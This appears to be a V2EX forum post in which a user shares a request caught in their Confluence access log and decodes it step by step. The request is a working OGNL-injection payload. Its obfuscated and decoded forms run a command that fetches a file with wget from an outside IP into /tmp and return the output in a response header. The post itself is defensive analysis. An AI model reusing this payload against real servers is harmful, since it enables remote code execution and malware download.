网站 ( http://101.43.177.155/) 在 confluence 的 access log 里发现的
[30/Jun/2022:00:00:03 +0800] - http-nio-6090-exec-400 101.43.177.155 GET //%24%7BClass.forName%28%22com%22%2B%22.opensymphony%22%2B%22.webwork%22%2B%22.ServletActionContext%22%29.getMethod%28%22getResponse%22%2Cnull%29.invoke%28null%2Cnull%29.setHeader%28%22CmdResponse%22%2CClass.forName%28%22javax%22%2B%22.script%22%2B%22.ScriptEngineManager%22%29.newInstance%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22eval%28String.fromCharCode%28118%2C97%2C114%2C32%2C115%2C61%2C39%2C39%2C59%2C118%2C97%2C114%2C32%2C112%2C112%2C32%2C61%2C32%2C106%2C97%2C118%2C97%2C46%2C108%2C97%2C110%2C103%2C46%2C82%2C117%2C110%2C116%2C105%2C109%2C101%2C46%2C103%2C101%2C116%2C82%2C117%2C110%2C116%2C105%2C109%2C101%2C40%2C41%2C46%2C101%2C120%2C101%2C99%2C40%2C39%2C119%2C103%2C101%2C116%2C32%2C104%2C116%2C116%2C112%2C58%2C47%2C47%2C57%2C50%2C46%2C49%2C49%2C56%2C46%2C49%2C56%2C56%2C46%2C49%2C54%2C55%2C58%2C53%2C55%2C56%2C57%2C47%2C104%2C97%2C111%2C32%2C45%2C80%2C32%2C47%2C116%2C109%2C112%2C47%2C39%2C41%2C46%2C103%2C101%2C116%2C73%2C110%2C112%2C117%2C116%2C83%2C116%2C114%2C101%2C97%2C109%2C40%2C41%2C59%2C119%2C104%2C105%2C108%2C101%2C32%2C40%2C49%2C41%2C32%2C123%2C118%2C97%2C114%2C32%2C98%2C32%2C61%2C32%2C112%2C112%2C46%2C114%2C101%2C97%2C100%2C40%2C41%2C59%2C105%2C102%2C32%2C40%2C98%2C32%2C61%2C61%2C32%2C45%2C49%2C41%2C32%2C123%2C98%2C114%2C101%2C97%2C107%2C59%2C125%2C115%2C61%2C115%2C43%2C83%2C116%2C114%2C105%2C110%2C103%2C46%2C102%2C114%2C111%2C109%2C67%2C104%2C97%2C114%2C67%2C111%2C100%2C101%2C40%2C98%2C41%2C125%2C59%2C106%2C97%2C118%2C97%2C46%2C117%2C116%2C105%2C108%2C46%2C66%2C97%2C115%2C101%2C54%2C52%2C46%2C103%2C101%2C116%2C85%2C114%2C108%2C69%2C110%2C99%2C111%2C100%2C101%2C114%2C40%2C41%2C46%2C101%2C110%2C99%2C111%2C100%2C101%2C84%2C111%2C83%2C116%2C114%2C105%2C110%2C103%2C40%2C115%2C46%2C103%2C101%2C116%2C66%2C121%2C116%2C101%2C115%2C40%2C41%2C41%29%29%22%29%29%7D/ HTTP/1.0 302 7042ms - - python-requests/2.28.0
url decode 之后是 [30/Jun/2022:00:00:03+0800]-http-nio-6090-exec-400101.43.177.155GET//${Class.forName("com"+".opensymphony"+".webwork"+".ServletActionContext").getMethod("getResponse",null).invoke(null,null).setHeader("CmdResponse",Class.forName("javax"+".script"+".ScriptEngineManager").newInstance().getEngineByName("nashorn").eval("eval(String.fromCharCode(118,97,114,32,115,61,39,39,59,118,97,114,32,112,112,32,61,32,106,97,118,97,46,108,97,110,103,46,82,117,110,116,105,109,101,46,103,101,116,82,117,110,116,105,109,101,40,41,46,101,120,101,99,40,39,119,103,101,116,32,104,116,116,112,58,47,47,57,50,46,49,49,56,46,49,56,56,46,49,54,55,58,53,55,56,57,47,104,97,111,32,45,80,32,47,116,109,112,47,39,41,46,103,101,116,73,110,112,117,116,83,116,114,101,97,109,40,41,59,119,104,105,108,101,32,40,49,41,32,123,118,97,114,32,98,32,61,32,112,112,46,114,101,97,100,40,41,59,105,102,32,40,98,32,61,61,32,45,49,41,32,123,98,114,101,97,107,59,125,115,61,115,43,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,98,41,125,59,106,97,118,97,46,117,116,105,108,46,66,97,115,101,54,52,46,103,101,116,85,114,108,69,110,99,111,100,101,114,40,41,46,101,110,99,111,100,101,84,111,83,116,114,105,110,103,40,115,46,103,101,116,66,121,116,101,115,40,41,41))"))}/HTTP/1.03027042ms--python-requests/2.28.0
String.fromCharCode 解析之后是 "var s='';var pp = java.lang.Runtime.getRuntime().exec('wget http://92.118.188.167:5789/hao -P /tmp/').getInputStream();while (1) {var b = pp.read();if (b == -1) {break;}s=s+String.fromCharCode(b)};java.util.Base64.getUrlEncoder().encodeToString(s.getBytes())""var s='';var pp = java.lang.Runtime.getRuntime().exec('wget http://92.118.188.167:5789/hao -P /tmp/').getInputStream();while (1) {var b = pp.read();if (b == -1) {break;}s=s+String.fromCharCode(b)};java.util.Base64.getUrlEncoder().encodeToString(s.getBytes())"
接下来分析思路就没了,各位彦祖有啥想法嘛,他是干啥的?
这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。
V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。
V2EX is a community of developers, designers and creative people.